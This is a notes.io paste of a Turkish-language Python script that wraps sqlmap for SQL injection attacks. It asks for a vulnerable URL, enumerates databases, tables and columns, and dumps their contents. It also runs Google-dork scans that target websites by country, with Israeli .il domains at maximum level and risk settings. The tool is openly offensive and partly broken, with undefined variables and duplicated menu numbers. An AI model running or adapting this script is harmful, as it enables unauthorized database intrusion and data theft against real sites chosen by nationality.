Notes![what is notes.io? What is notes.io?](/theme/images/whatisnotesio.png)
![]() ![]() Notes - notes.io |
choice='0'
while choice == '0':
print("""
###################################################################################
################### ANA MENÜ #########################
###################################################################################
### Ana Menü: 1 ile 5 arasında seçim yapın...
### 1- Sadece Açıklı Linki Biliyorum.
### 2- Açıklı Linki, VeriTabanı Adını Biliyorum.
### 3- Açıklı Linki, VeriTabanı Adını, Tablo Adını Biliyorunm.
### 4- Açıklı Linki, VeriTabanı Adını, Tablo Adını, Colon Adını Biliyorum.
### 5- Gelişmiş Dork taraması...
""")
choice = input ("Lütfen seçiminizi girin: ")
if choice == "5":
dork_tarama_menu()
elif choice == "4":
aciklilink = input("Açıklı Linki Girin: ")
veritabani = input("VeriTabanı Adını Girin: ")
tablo = input("Tablo Adını Girin: ")
colon = input("Kolon Adını Girin: ")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "3":
aciklilink = raw_input("Açıklı Linki Girin: ")
veritabani = raw_input("VeriTabanı Adını Girin: ")
tablo = raw_input("Tablo Adını Girin: ")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " --columns --random-agent")
elif choice == "2":
aciklilink = raw_input("Açıklı Linki Girin: ")
veritabani = raw_input("VeriTabanı Adını Girin: ")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " --tables --random-agent")
elif choice == "1":
aciklilink = raw_input("Açıklı Linki Girin: ")
os.system("sqlmap -u " + aciklilink + " --dbs --random-agent")
else:
print("I don't understand your choice.")
def dork_tarama_menu():
print("""
###################################################################################
################### Dork Taraması #########################
###################################################################################
### 0- Ana Menü
### 1- Ülkeye göre tarama
### 2- Tanımlı dorklara göre tarama
### 3- Özgün dorklarla tarama
""")
choice = input ("Lütfen seçiminizi girin: ")
if choice == "0":
main()
elif choice == "1":
dork_tarama_ulke_menu()
elif choice == "2":
dork_tarama_oto_menu()
elif choice == "3":
dork_tarama_manuel_menu()
def dork_tarama_ulke_menu():
print("""
###################################################################################
################### ÜLKEYE GÖRE DORK TARAMASI #########################
###################################################################################
### 0- Ana Menü
### 1- Üst Menü
### 2- israil
### 3- yunanistan
### 2- fransa
### 3- amerika
### 2- rusya
### 3- almanya
### 2- avusturya
### 3- avusturalya
""")
choice = input ("Lütfen ülke sçiminizi giriniz:")
if choice == "0":
main()
elif choice == "1":
dork_tarama_menu()
elif choice == "2":
print("Bismillahirrahmanirrahim... israil uzantılı siteler dorklara göre taranmaya başladı...")
dork_il()
elif choice == "3":
print("Bismillahirrahmanirrahim... yunanistan uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "4":
print("Bismillahirrahmanirrahim... fransa uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "5":
print("Bismillahirrahmanirrahim... amerika uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "6":
print("Bismillahirrahmanirrahim... rusya uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "7":
print("Bismillahirrahmanirrahim... almanya uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "8":
print("Bismillahirrahmanirrahim... avusturya uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
elif choice == "9":
print("Bismillahirrahmanirrahim... avusturalya uzantılı siteler dorklara göre taranmaya başladı...")
os.system("sqlmap -u " + aciklilink + " -D " + veritabani + " -T " + tablo + " -C " + colon + " --dump --random-agent")
def dork_tarama_oto_menu():
print("0- Ana Menü")
print("1- Üst Menü")
print("2- DORK1")
print("3- DORK2")
print("4- DORK3")
print("5- DORK4")
print("6- DORK5")
print("7- DORK6")
print("8- DORK7")
print("9- DORK8")
choice = input ("Lütfen dork seçiminizi giriniz:")
if choice == "0":
main()
elif choice == "1":
dork_tarama_menu()
elif choice == "2":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "3":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "4":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "5":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "6":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "7":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "8":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
elif choice == "9":
print("Bismillahirrahmanirrahim... Belirlenen dorka göre taranmaya başladı...")
def dork_tarama_manuel_menu():
print("0- Ana Menü")
print("1- Üst Menü")
print("Taratmak istediğiniz dorku yazın")
choice = input ("Taratmak istediğiniz dorku yazın yada menü seçiminizi yapın:")
if choice == "0":
main()
elif choice == "1":
dork_tarama_menu()
elif choice == "2":
dork_tarama_oto_menu()
elif choice == "3":
print("Bismillahirrahmanirrahim... Belirttiğiniz dorka göre taranmaya başladı...")
def dork_il():
os.system("sqlmap -g " + """intext:"error in your SQL syntax" +site:il""" + " --random-agent -v3 --batch --threads=10 --level=5 --risk=3 --dbs")
print("error in your SQL syntax taraması tamamlandı...")
os.system("sqlmap -g " + """intext:"mysql_num_rows()" +site:il""" + " --random-agent -v3 --batch --threads=10 --level=5 --risk=3 --dbs")
print("mysql_num_rows taraması tamamlandı...")
os.system("sqlmap -g " + """intext:"mysql_fetch_array()" +site:il""" + " --random-agent -v3 --batch --threads=10 --level=5 --risk=3 --dbs")
print("mysql_fetch_array taraması tamamlandı...")
main()
![]() |
Notes is a web-based application for online taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000+ notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 14 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team